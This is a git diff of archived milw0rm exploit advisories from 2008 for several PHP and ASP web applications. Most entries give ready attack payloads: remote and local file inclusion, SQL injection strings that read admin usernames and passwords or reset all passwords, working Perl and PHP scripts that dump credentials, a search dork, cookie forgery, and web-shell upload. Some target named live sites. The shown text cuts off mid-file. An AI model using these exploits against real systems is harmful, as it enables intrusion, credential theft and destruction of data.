-#########################################################################################
-[0x02] Bug:[Remote File Inclusion]
-######
-
-Bugged file is: /[path]/calendar.php
-
-[CODE]
-<?PHP require 'data/conf.php'; //Include the global config ?>
-	<?php include("$lang") ?>
-[/CODE]
-
-$lang variable is not declared, I thought it was declared on conf.php, but it's not.
-So we can set the $lang value directly from GET.
-
-FIX : Just declare $lang, for example in /[path]/data/conf.php
-
-
-[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]
-
-########################################################################################
-[0x03] Bug:[Sensitive Data Disclosure]
-######
-
-In this cms, when an user register himself, the cms puts informations like username and
-password on a .txt file. So, just going on it, we can get sensitive data like username
-and passoword. username:md5_hash
-
-
-[!] EXPLOIT: /[path]/data/usr.txt
-
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-15]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : WorkSimple 1.2.1
+Download       : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1
+Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay
+
+
+#########################################################################################
+[0x02] Bug:[Remote File Inclusion]
+######
+
+Bugged file is: /[path]/calendar.php
+
+[CODE]
+<?PHP require 'data/conf.php'; //Include the global config ?>
+	<?php include("$lang") ?>
+[/CODE]
+
+$lang variable is not declared, I thought it was declared on conf.php, but it's not.
+So we can set the $lang value directly from GET.
+
+FIX : Just declare $lang, for example in /[path]/data/conf.php
+
+
+[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]
+
+########################################################################################
+[0x03] Bug:[Sensitive Data Disclosure]
+######
+
+In this cms, when an user register himself, the cms puts informations like username and
+password on a .txt file. So, just going on it, we can get sensitive data like username
+and passoword. username:md5_hash
+
+
+[!] EXPLOIT: /[path]/data/usr.txt
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7482.txt b/platforms/php/webapps/7482.txt
index f349f1b05..35ec34c6c 100755
--- a/platforms/php/webapps/7482.txt
+++ b/platforms/php/webapps/7482.txt
@@ -1,80 +1,80 @@
- 
-===========================================================================================================
- 
- 
-  [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities
- 
-       Software : Aperto Blog version 0.1.1
-       Vendor   : http://code.google.com/p/apertoblog/
-       Download : http://code.google.com/p/apertoblog/downloads/list
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
- 
- 
-===========================================================================================================
- 
- 
-  [o] Vulnerable file
- 
-       admin.php
- 
-        if(isset($_GET['action'])) {
-        if($_GET['action']=="logout") {
-        session_destroy();
-        go('index.php');
-        } else {
-        if(file_exists($_GET['action'].".php")) {
-        include($_GET['action'].".php");
-        } else {
-        echo "404";
- 
-       index.php
- 
-        if(!$_GET['get']) {
-        $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10");
-        while($row = mysql_fetch_array($articles)) {
-        showarticle($row, $settings[5]);
-        }
-        } elseif(file_exists($_GET['get'].".php")) {
-        include($_GET['get'].".php");
-        } else {
-        echo "404";
- 
-       categories.php
- 
-        if(isset($_GET['id'])) {
-        $cid = $_GET['id'];
-        //Load category info
-        $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'");
- 
- 
- 
-  [o] Exploit
- 
-       [ Local File Inclusion ]
- 
-     http://localhost/[path]/admin.php?action=[LFI]
-     http://localhost/[path]/index.php?get=[LFI]
- 
-       [ SQL Injection ]
- 
-     http://localhost/[path]/categories.php?id=[SQL]
- 
- 
-===========================================================================================================
- 
- 
-  [o] Greetz
- 
-       MainHack BrotherHood [ http://mainhack.com/ ]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11 martfella
-       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
- 
-       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
- 
-         
-===========================================================================================================
-
-# milw0rm.com [2008-12-15]
+ 
+===========================================================================================================
+ 
+ 
+  [o] Aperto Blog 0.1.1 Local File Inclusion and SQL Injection Vulnerabilities
+ 
+       Software : Aperto Blog version 0.1.1
+       Vendor   : http://code.google.com/p/apertoblog/
+       Download : http://code.google.com/p/apertoblog/downloads/list
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+ 
+ 
+===========================================================================================================
+ 
+ 
+  [o] Vulnerable file
+ 
+       admin.php
+ 
+        if(isset($_GET['action'])) {
+        if($_GET['action']=="logout") {
+        session_destroy();
+        go('index.php');
+        } else {
+        if(file_exists($_GET['action'].".php")) {
+        include($_GET['action'].".php");
+        } else {
+        echo "404";
+ 
+       index.php
+ 
+        if(!$_GET['get']) {
+        $articles = mysql_query("SELECT * FROM articles ORDER BY id DESC LIMIT 10");
+        while($row = mysql_fetch_array($articles)) {
+        showarticle($row, $settings[5]);
+        }
+        } elseif(file_exists($_GET['get'].".php")) {
+        include($_GET['get'].".php");
+        } else {
+        echo "404";
+ 
+       categories.php
+ 
+        if(isset($_GET['id'])) {
+        $cid = $_GET['id'];
+        //Load category info
+        $getcat = mysql_query("SELECT * FROM categories WHERE id='$cid'");
+ 
+ 
+ 
+  [o] Exploit
+ 
+       [ Local File Inclusion ]
+ 
+     http://localhost/[path]/admin.php?action=[LFI]
+     http://localhost/[path]/index.php?get=[LFI]
+ 
+       [ SQL Injection ]
+ 
+     http://localhost/[path]/categories.php?id=[SQL]
+ 
+ 
+===========================================================================================================
+ 
+ 
+  [o] Greetz
+ 
+       MainHack BrotherHood [ http://mainhack.com/ ]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
+ 
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+ 
+         
+===========================================================================================================
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7487.txt b/platforms/php/webapps/7487.txt
index 58563c6a9..b089bcc29 100755
--- a/platforms/php/webapps/7487.txt
+++ b/platforms/php/webapps/7487.txt
@@ -1,30 +1,30 @@
-                                !!..:: ZAC003 ::..!!
-                    -+( Vive int Iranian WhiteHat Nomads Group )+-
--------------------------------------------------------------------------------------------
-Reporter : ZAC003 From Aria-Security.Net
-Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html
-BUG :
-+ class/download.php +
-[Code]
-4:    $id = $_GET['id']; //Bug Here !
-5:    $how = "n";
-6:    $kind = "point";
-7:    $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here !
-8:    while($r=mysql_fetch_array($result))
-9:    {
-[/Code]
-[Exploit]
-    Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5
-    Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/*
-    For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/*
-    For View File Name And Secret Key (PROVIDING BE) :
-    For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/*
-    Upload Shell = [Priv8 Perl Script]
-    Update Ads Table(id,text): Use Update SQL Command !
-[/Exploit]
--------------------------------------------------------------------------------------------
-For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools)
-SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group
-greets : M3hd!.h4ckCity And All Member of Aria-Security
-
-# milw0rm.com [2008-12-16]
+                                !!..:: ZAC003 ::..!!
+                    -+( Vive int Iranian WhiteHat Nomads Group )+-
+-------------------------------------------------------------------------------------------
+Reporter : ZAC003 From Aria-Security.Net
+Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html
+BUG :
++ class/download.php +
+[Code]
+4:    $id = $_GET['id']; //Bug Here !
+5:    $how = "n";
+6:    $kind = "point";
+7:    $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here !
+8:    while($r=mysql_fetch_array($result))
+9:    {
+[/Code]
+[Exploit]
+    Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5
+    Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/*
+    For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/*
+    For View File Name And Secret Key (PROVIDING BE) :
+    For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/*
+    Upload Shell = [Priv8 Perl Script]
+    Update Ads Table(id,text): Use Update SQL Command !
+[/Exploit]
+-------------------------------------------------------------------------------------------
+For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools)
+SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group
+greets : M3hd!.h4ckCity And All Member of Aria-Security
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7489.pl b/platforms/php/webapps/7489.pl
index 9e855e743..5130b0f38 100755
--- a/platforms/php/webapps/7489.pl
+++ b/platforms/php/webapps/7489.pl
@@ -1,46 +1,46 @@
-#!/usr/bin/perl -w
-#
-# Free Links Directory Script V1.2a Remote SQL Injection Exploit
-# written by ka0x <ka0x01[alt+64]gmail.com>
-# D.O.M Labs Security Researchers
-# - www.domlabs.org -
-#
-# Vuln code (report.php):
-#
-# if($_COOKIE['logged']=="") {
-# [...] // login
-# else {
-#     $linkida = $_GET['linkid'];
-#     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
-# [...]
-#
-
-use strict;
-use LWP::UserAgent;
- 
-my $host = $ARGV[0];
-
-die "[*] usage: perl $0 <host>\n" unless $ARGV[0];
-
-if ($host !~ /^http:/){ $host = 'http://'.$host; }
-
-my $ua = LWP::UserAgent->new() or die ;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
-$ua->timeout(10) ;
-$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs
-
-my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");
-
-my $res = $ua->request($req);
-my $con = $res->content;
-
-if ($res->is_success && $con =~ m/____(.*?)____/ms){
-    print $1;
-}
-else {
-    print "[-] exploit failed!\n";
-}
-
-__END__
-
-# milw0rm.com [2008-12-16]
+#!/usr/bin/perl -w
+#
+# Free Links Directory Script V1.2a Remote SQL Injection Exploit
+# written by ka0x <ka0x01[alt+64]gmail.com>
+# D.O.M Labs Security Researchers
+# - www.domlabs.org -
+#
+# Vuln code (report.php):
+#
+# if($_COOKIE['logged']=="") {
+# [...] // login
+# else {
+#     $linkida = $_GET['linkid'];
+#     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
+# [...]
+#
+
+use strict;
+use LWP::UserAgent;
+ 
+my $host = $ARGV[0];
+
+die "[*] usage: perl $0 <host>\n" unless $ARGV[0];
+
+if ($host !~ /^http:/){ $host = 'http://'.$host; }
+
+my $ua = LWP::UserAgent->new() or die ;
+$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
+$ua->timeout(10) ;
+$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs
+
+my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");
+
+my $res = $ua->request($req);
+my $con = $res->content;
+
+if ($res->is_success && $con =~ m/____(.*?)____/ms){
+    print $1;
+}
+else {
+    print "[-] exploit failed!\n";
+}
+
+__END__
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7490.php b/platforms/php/webapps/7490.php
index b88c3ec20..7b03d78b2 100755
--- a/platforms/php/webapps/7490.php
+++ b/platforms/php/webapps/7490.php
@@ -1,116 +1,116 @@
-<?php
-    ini_set("max_execution_time",0);
-    ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
-    print_r('
-###############################################################
-#
-#           Aiyoota! CMS - Blind SQL Injection Exploit      
-#                                                              
-#      Vulnerability discovered by: Lidloses_Auge              
-#      Exploit coded by:            Lidloses_Auge
-#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
-#                                   Palme, GPM, Free-Hack
-#      Date:                        16.12.2008
-#
-###############################################################
-#                                                              
-#      Dork: inurl:naviid + inurl:liste9
-#      Admin Panel: [Target]/cms/
-#      Usage (Method 1 auto):  php '.$argv[0].' -1 [Target]
-#      Usage (Method 2 manually):  php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
-#      Example (Method 1) for http://www.site.com
-#      => php '.$argv[0].' -1 http://www.site.com
-#      Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
-#      => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
-#                                                              
-###############################################################
-');
-    $automatic = $argv[1];
-    $url = $argv[2];
-    if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
-        if ($argv[1] == "-1") {
-            $source = file_get_contents($url."/index.html");
-            $buffer = $source;
-            if (strpos($source,"a href='$url/") != 0) {
-                $place = strpos($source,"a href='$url/");
-                $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
-                $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
-            } else {
-                while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
-                    $buffer = substr($buffer,strpos($buffer,"a href='/"));
-                }
-                $place = strpos($buffer, "a href='/");
-                $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
-                $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
-            }
-            $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
-            $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
-            $part1 = substr($urlpart,0,$injplace);
-            $part2 = substr($urlpart,$injplace);
-        } elseif ($argv[1] == "-2") {
-            $part1 = $url."/".$argv[3]."/".$argv[4];
-            $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
-        }
-        echo "\nExploiting now!\n\n";
-        $true = file_get_contents($part1."+and+1=1".$part2);
-        $false = file_get_contents($part1."+and+1=0".$part2);
-        $inj = $false;
-        $tbl = array("benutzer","passwort");
-        if (strlen($false) != strlen($true)) {
-            for ($mode = 0; $mode <= 1; $mode++) {
-                echo $tbl[$mode].": ";
-                while ($break == 0) {
-                    $count++;
-                    $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
-                    $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
-                    $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
-                    $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
-                    $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
-                    if (strlen($false) / strlen($injpart1) * 100 < 98) {
-                        if (strlen($false) / strlen($injpart2) * 100 < 98) {
-                            $border1 = 103;
-                            $border2 = 122;
-                        } else {
-                            $border1 = 96;
-                            $border2 = 108;
-                        }
-                    }
-                    if (strlen($false) / strlen($injpart3) * 100 < 98) {
-                        if (strlen($false) / strlen($injpart4) * 100 < 98) {
-                            if (strlen($false) / strlen($injpart5) * 100 < 98) {
-                                $border1 = 47;
-                                $border2 = 57;
-                            } else {
-                            $border1 = 59;
-                            $border2 = 69;
-                            }
-                        } else {    
-                        $border1 = 70;
-                        $border2 = 96;
-                        }
-                    }        
-                    for ($i = $border1; $i<=$border2; $i++) {
-                        $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
-                        if (strlen($false) / strlen($zero) * 100 < 98) {
-                            $break = 1;
-                            echo "\n";
-                            $i = $border2+1;
-                        } else {
-                            $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
-                            if ((strlen($inj) / strlen($true) * 100) < 98) {
-                                echo chr($i);
-                                $i = $border2+1;
-                            }
-                        }
-                    }
-                }
-                $break = 0;
-                $count = 0;
-            }
-        }
-    } else {
-        echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
-    }
-?>
-
-# milw0rm.com [2008-12-16]
+<?php
+    ini_set("max_execution_time",0);
+    ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
+    print_r('
+###############################################################
+#
+#           Aiyoota! CMS - Blind SQL Injection Exploit      
+#                                                              
+#      Vulnerability discovered by: Lidloses_Auge              
+#      Exploit coded by:            Lidloses_Auge
+#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
+#                                   Palme, GPM, Free-Hack
+#      Date:                        16.12.2008
+#
+###############################################################
+#                                                              
+#      Dork: inurl:naviid + inurl:liste9
+#      Admin Panel: [Target]/cms/
+#      Usage (Method 1 auto):  php '.$argv[0].' -1 [Target]
+#      Usage (Method 2 manually):  php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
+#      Example (Method 1) for http://www.site.com
+#      => php '.$argv[0].' -1 http://www.site.com
+#      Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
+#      => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
+#                                                              
+###############################################################
+');
+    $automatic = $argv[1];
+    $url = $argv[2];
+    if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
+        if ($argv[1] == "-1") {
+            $source = file_get_contents($url."/index.html");
+            $buffer = $source;
+            if (strpos($source,"a href='$url/") != 0) {
+                $place = strpos($source,"a href='$url/");
+                $sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
+                $urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
+            } else {
+                while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
+                    $buffer = substr($buffer,strpos($buffer,"a href='/"));
+                }
+                $place = strpos($buffer, "a href='/");
+                $sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
+                $urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
+            }
+            $varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
+            $injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
+            $part1 = substr($urlpart,0,$injplace);
+            $part2 = substr($urlpart,$injplace);
+        } elseif ($argv[1] == "-2") {
+            $part1 = $url."/".$argv[3]."/".$argv[4];
+            $part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
+        }
+        echo "\nExploiting now!\n\n";
+        $true = file_get_contents($part1."+and+1=1".$part2);
+        $false = file_get_contents($part1."+and+1=0".$part2);
+        $inj = $false;
+        $tbl = array("benutzer","passwort");
+        if (strlen($false) != strlen($true)) {
+            for ($mode = 0; $mode <= 1; $mode++) {
+                echo $tbl[$mode].": ";
+                while ($break == 0) {
+                    $count++;
+                    $injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
+                    $injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
+                    $injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
+                    $injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
+                    $injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
+                    if (strlen($false) / strlen($injpart1) * 100 < 98) {
+                        if (strlen($false) / strlen($injpart2) * 100 < 98) {
+                            $border1 = 103;
+                            $border2 = 122;
+                        } else {
+                            $border1 = 96;
+                            $border2 = 108;
+                        }
+                    }
+                    if (strlen($false) / strlen($injpart3) * 100 < 98) {
+                        if (strlen($false) / strlen($injpart4) * 100 < 98) {
+                            if (strlen($false) / strlen($injpart5) * 100 < 98) {
+                                $border1 = 47;
+                                $border2 = 57;
+                            } else {
+                            $border1 = 59;
+                            $border2 = 69;
+                            }
+                        } else {    
+                        $border1 = 70;
+                        $border2 = 96;
+                        }
+                    }        
+                    for ($i = $border1; $i<=$border2; $i++) {
+                        $zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
+                        if (strlen($false) / strlen($zero) * 100 < 98) {
+                            $break = 1;
+                            echo "\n";
+                            $i = $border2+1;
+                        } else {
+                            $inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
+                            if ((strlen($inj) / strlen($true) * 100) < 98) {
+                                echo chr($i);
+                                $i = $border2+1;
+                            }
+                        }
+                    }
+                }
+                $break = 0;
+                $count = 0;
+            }
+        }
+    } else {
+        echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
+    }
+?>
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7493.txt b/platforms/php/webapps/7493.txt
index 42d8b32db..a78156ab8 100755
--- a/platforms/php/webapps/7493.txt
+++ b/platforms/php/webapps/7493.txt
@@ -1,31 +1,31 @@
-Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
-
-author : Cold z3ro, www.hackteach.org
-
-Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
-
-==============
-[#] SQL Injection
-
-http://www.site.com/[path]/forgotpass.asp
-
-    In uid insert SQL command's =>
-
-SCMD ==>    ' or '1=1
-SCMD ==>    ' or 'update tblusers set password = "z3ro"
-
-
-all passwords will be z3ro
-
-=============
-[#] Database Disclosure
-
-http://www.site.com/[path]/db/helpdesk2000.mdb
-
-
-
-example :
-https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
-http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
-
-# milw0rm.com [2008-12-16]
+Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
+
+author : Cold z3ro, www.hackteach.org
+
+Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
+
+==============
+[#] SQL Injection
+
+http://www.site.com/[path]/forgotpass.asp
+
+    In uid insert SQL command's =>
+
+SCMD ==>    ' or '1=1
+SCMD ==>    ' or 'update tblusers set password = "z3ro"
+
+
+all passwords will be z3ro
+
+=============
+[#] Database Disclosure
+
+http://www.site.com/[path]/db/helpdesk2000.mdb
+
+
+
+example :
+https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
+http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7494.txt b/platforms/php/webapps/7494.txt
index 86ccc4754..f42bae492 100755
--- a/platforms/php/webapps/7494.txt
+++ b/platforms/php/webapps/7494.txt
@@ -1,66 +1,66 @@
-[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
-[~]
-[~] script: http://www.zeltatrade.com/
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Date: 16/12/2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-exp for demo: (R-SQL)
-
-user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
-
-pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
-
-
-exp for demo: (B-SQL)
-
-http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
-
-http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
-
-
-exp for demo: (auth bypass)
-
-http://joineazy.com/members/login.asp
-
-username: trt-turk@hotmail.com
-
-pass: ' or '
-
-
-exp for demo: (admin bypass)
-
-http://joineazy.com/embadmin/admin_main.asp
-
-http://joineazy.com/embadmin/site_setup.asp
-
-http://joineazy.com/embadmin/main_baseimage.asp
-
-
-exp for demo: (RFU)
-
-firs you register to site
-
-login to site and edit your pictures select your shell.asp
-
-go your shell asp:
-
-http://joineazy.com/members/member_pictures/shell.asp
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke 
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-12-16]
+[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
+[~]
+[~] script: http://www.zeltatrade.com/
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Date: 16/12/2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+exp for demo: (R-SQL)
+
+user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
+
+pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
+
+
+exp for demo: (B-SQL)
+
+http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
+
+http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
+
+
+exp for demo: (auth bypass)
+
+http://joineazy.com/members/login.asp
+
+username: trt-turk@hotmail.com
+
+pass: ' or '
+
+
+exp for demo: (admin bypass)
+
+http://joineazy.com/embadmin/admin_main.asp
+
+http://joineazy.com/embadmin/site_setup.asp
+
+http://joineazy.com/embadmin/main_baseimage.asp
+
+
+exp for demo: (RFU)
+
+firs you register to site
+
+login to site and edit your pictures select your shell.asp
+
+go your shell asp:
+
+http://joineazy.com/members/member_pictures/shell.asp
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke 
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-12-16]
diff --git a/platforms/php/webapps/7497.txt b/platforms/php/webapps/7497.txt
index f76a419d9..6aa10db52 100755
--- a/platforms/php/webapps/7497.txt
+++ b/platforms/php/webapps/7497.txt
@@ -1,96 +1,96 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : RSMScript 1.21
-Download       : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1
-Vulnerability  : Insecure Cookie Handling / XXS
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-#########################################################################################
-[0x02] Bug: [Insecure Cookie Handling]
-######
-
-Bugged file is: /[path]/verify.php
-
-[CODE]
-
-if($admin_pass == $code)
-{
-  setcookie("verified", "null", time()+1800);
-  header( 'refresh: 0; url=update.php' );
-}
-
-[/CODE]
-
-As we can see, if the password "$code" typed is the same of $admin_pass, so you log in,
-cookie is set with the name "verified" and with content "null". So, a malicious user
-can just set up a cookie with that name and value, and then he will be logged as the 
-admin.
-
-[!] FIX: A fix could be to put as a content or cookie name the password. Example:
-
-[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE]
-
-
-[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/";
-
-#########################################################################################
-[0x03] Bug: [XSS]
-######
-
-To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;)
-There are two bugged file.
-
-1) /[path/submit.php
-   In this file, we can put arbitrary data into a .txt file.
-
-   [CODE]
-
-    $quote = $_REQUEST['quote'];
-    $writePage = fopen('quotes.txt', 'a') or die("can't open file");
-	fwrite($writePage, "\t");
-    fwrite($writePage, stripslashes($quote));
-    fclose($writePage);
-
